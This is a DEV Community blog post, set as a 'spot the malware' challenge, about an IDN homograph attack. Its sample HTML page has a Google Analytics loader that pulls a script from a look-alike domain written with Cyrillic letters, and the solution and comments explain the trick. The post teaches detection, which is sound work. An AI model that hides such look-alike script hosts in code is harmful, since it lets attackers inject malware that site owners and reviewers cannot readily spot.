DEV Community

Antony Garand
Antony Garand

Posted on

Spot the malware

Challenge

Help!

My website was recently infected, and I can't seem to get rid of the casino ads it is generating!
All I am serving is this plain html file, could you help me find out what is causing it?

The google analytics part was generated from the Adding analytics.js to Your Site page!

Index.html:

<title>Are you lost ?</title>
<h1>Lost on the internet?</h1>
<h2>Don't panic! I'm here to help</h2>
<strong><pre> * &lt;----- You are here</pre></strong>
<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-аnаlytics.com/analytics.js','ga');

ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
Enter fullscreen mode Exit fullscreen mode

Solution

This may seem like a regular website with Google Analytics attached, but there is a twist!
It may be more obvious when serving the page and inspecting the network tab:
Analytics

Instead of loading the expected google-analytics.com domain, the xn--google-nlytics-1tlb.com domain is loaded.

Why is that you may ask?

Well, the answer is in both a of google-analytics.com: They aren't your good old ascii a, but are actually cyrillic a!

Check it yourself: https://www.google-аnаlytics.com (Note: Domain not registered)

This leads us to a good old homograph attack, where most of us will see the legit google-analytics domain while its punycode equivalent, xn--google-nlytics-1tlb.com, will be loaded.

Punycode and homograph attacks are used a lot in phishing campaigns but most browsers will show the decoded xn-- url.

When reading source code though, IDE's and text editors usually show a regular cyrillic a, which is hard to distinguish with our bare eyes.
This can be leveraged by malware creators by registering hosts similar to popular CDN's and injected scripts, then replacing genuine domain with their own.

This would make it impossible to see when simply looking at the source code, such as with the index.html file, yet would allow them to inject malware on the websites.

Reference

  • Homographs-attack Check out this post's reference if you need more, I can't match its completeness.

Top comments (9)

Collapse
 
stephanie profile image
Stephanie Handsteiner • Edited

Good description. :)

I mean here in the example it's easy to spot, because it's not much code to scan, but in a real world project, it might not be that easy to spot after scanning hundreds lines of code.

There's really not much you can do except keeping a close eye on your site's network requests.

Collapse
 
antogarand profile image
Antony Garand

Even there, you need to ensure the domain will be rendered as punycode in the network tab.

To check it in the network tab also implies you are running the code, which is quite unsafe for malware, it may already be too late if the malware can execute itself.

Collapse
 
gmartigny profile image
Guillaume Martigny

A real attacker would need to change the code snippet on google site. Which is, let's be honest, impossible.

However, you indeed need to be really careful with the code you copy/paste from Internet.

Collapse
 
antogarand profile image
Antony Garand

The scenario I am expecting here is for a website to be infected, such as a WordPress blog having a vulnerable plugin or outdated version.

Once the website is compromised, the attacker can change the analytics code and it would be really hard to detect.

Collapse
 
codemouse92 profile image
Jason C. McDonald

Creepy.

But good to know!

Collapse
 
thisisbinh profile image
Binh Bui

Since you discover this, maybe you can give us some solutions on how to prevent this? (I have zero experience in security btw)

Collapse
 
cotcotcoder profile image
JeffD

Nice challenge idea, perfect explanation 👍

Collapse
 
creativ_bracket profile image
Jermaine

Thanks Antony.

My first time hearing about this. Would love to see more security posts.

Collapse
 
antogarand profile image
Antony Garand

Check out my profile to find more, I've got few security-related posts out already!